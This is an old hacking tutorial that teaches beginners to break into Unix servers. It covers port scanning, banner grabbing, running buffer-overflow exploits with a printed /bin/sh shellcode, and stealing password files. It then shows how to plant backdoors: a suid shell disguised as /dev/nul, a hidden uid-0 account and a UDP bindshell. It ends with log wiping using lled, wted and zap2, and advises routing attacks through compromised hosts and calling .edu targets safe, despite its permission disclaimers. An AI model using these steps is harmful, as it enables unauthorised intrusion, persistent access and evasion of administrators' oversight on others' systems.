on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.



Let's start
~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.


Some definitions
~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.



Operating Systems
~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

- commercial UNIXes
- free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.

- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit http://www.suse.de/ and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.



the Internet
~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.


ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.

Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.


Don't get busted
~~~~~~~~~~~~~~~~


Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website oe email address, find your ISP, your phone number, your home...
and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).

Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes

- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.


TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~

Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3


Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3

TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

bash-2.03$ man nmap


How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The most obvious and simple way is using FTP:

bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.


But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

sh-2.03$ gcc program.c -o program

and execute:

sh-2.03$ ./program



Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

http://www.hack.co.za/
http://www.r00tabega.org/
http://www.rootshell.com/
http://www.securityfocus.com/
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from .
sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu

login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal.
Of course, I haven't listed all the exploit kinds that exist, only the most common.



Putting backdoors
~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.


Anyway, i'll explain the basics of it.

1.How to make a sushi:

To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:

sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:
sh-2.03$ exit

Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!


There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.

This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell

When uid=0 and gid=0, that luser gets superluser priviledges.

Then we add a line like this:

dood::0:0:dood:/:/bin/sh (put it in a hidden place)


So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develope.


3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.

You can get an UDP bindshell coded by !hispahack from my site.


Cleaning up
~~~~~~~~~~~

Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:

Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.

So, what will be displayed when luser logsin again?

Last login: Sun Sep 24 10:32:14 from .

Then luser writes a mail to the admin:

"It has happen some strange thing, when I loggedin today, I've read a line like this:

Last login: Sun Sep 24 10:32:14 from .

Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone acceded the system using your password, don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get . Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in:

/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog

and we can erase it using lled (get it from my site)

lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.


The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?

sh-2.03$ who
root tty1 Sep 25 18:18

Then we shall use zap2. If you loggedin as 'luser', then type:

sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$

And luser has never been here.